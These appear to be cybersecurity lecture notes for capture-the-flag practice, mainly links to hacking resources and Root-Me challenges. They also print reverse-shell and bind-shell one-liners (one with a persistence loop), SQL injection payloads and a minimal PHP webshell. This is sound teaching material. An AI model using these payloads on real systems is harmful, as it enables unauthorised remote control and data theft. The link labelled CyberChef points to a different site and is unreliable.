# Cybersecurity Lecture notes

This file lists interesting links related to computer security (tools, information, tutorials, interesting sites, resources).

## Interesting links

* [RootMe](https://www.root-me.org/)
* [HackTheBox](https://www.hackthebox.eu/)
* [Podcast le comptoirsecu](https://www.comptoirsecu.fr/)
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [Collection of BURP payloads](https://github.com/1N3/IntruderPayloads)

## PrivESC

[Windows Privilege Escalation Cheat Sheet](https://gist.github.com/sckalath/8dacd032b65404ef7411#file-windows_privesc-L66)

[Linux Privilege Escalation Binary](https://gtfobins.github.io/)

[LinEnum](https://github.com/rebootuser/LinEnum)

[Unix privesc](http://pentestmonkey.net/tools/audit/unix-privesc-check)

[Linprivchecker](https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py)

[Monitor linux process](https://github.com/DominicBreuker/pspy)

## Reverse shell

[Ngrok: Expose ports to the Internet](https://dashboard.ngrok.com/get-started)

[Plink ssh tunnels on windows](https://medium.com/@incubusattax/setting-up-an-ssh-tunnel-using-plink-7d8dacfd4014)

## Steganography

[Aperi'Solve performs layer analysis on images](https://aperisolve.fr/)

## Tools

[CyberChef: Encode and decode data](https://aperisolve.fr/)

[Download Kali Linux live 2020.4](https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-live-amd64.iso)

## How to crack a password

1. Identify the type of hash

* <https://hashes.com/en/tools/hash_identifier>

2. Use John the Ripper (already installed on Kali)

* <https://fr.wikipedia.org/wiki/John_the_Ripper>
* <https://myhackingworld.com/crack-passwords-with-john-the-ripper/>

3. Use a custom wordlist with John the Ripper

* <https://gitlab.com/kalilinux/packages/wordlists/blob/kali/master/rockyou.txt.gz>

## Reverse/bind shell

```sh
# Reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
socat file:`tty`,raw,echo=0 TCP-L:port

# Bind shell
nc -lvp 4444 -e /bin/bash

# Add a bit of persistence:
while true; do nc -lvp 4444 -e /bin/bash; done
```

## SQL example payloads

<https://portswigger.net/web-security/sql-injection/cheat-sheet>

```sql
user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --
```

## PHP: the simplest webshell

```PHP
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }

// To go further: https://github.com/flozz/p0wny-shell
?>
```

## Challenges

### STEP 1

* [HTTP - Headers](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Headers)
* [HTTP - User-agent](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-User-agent)
* [Backup files](https://www.root-me.org/fr/Challenges/Web-Serveur/Fichier-de-sauvegarde) -> Hint: dirb/mutations\_common

### STEP 2

* [Path traversal](https://www.root-me.org/fr/Challenges/Web-Serveur/Directory-traversal)
* [File-upload-double-extensions](https://www.root-me.org/fr/Challenges/Web-Serveur/File-upload-double-extensions)
* [File Upload type MIME](https://www.root-me.org/fr/Challenges/Web-Serveur/File-upload-Type-MIME)
* [XSS Injection](https://xss-game.appspot.com/level1)

### STEP 3

* [SQL injection - Authentication](https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-Authentification)
* [Injection (SQL blind)](https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-en-aveugle)
* [Injection (SQL String)](https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-String)

## String to decode

```
427261766f207475206120726575737369206c6520636816c6c656e6765

aidhaSBwZXJkdQ==

26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b
```

## Wifi challenge

WEP - <https://ufile.io/h28b15y2>

WPA2 - <https://ufile.io/3qfmvxzn>
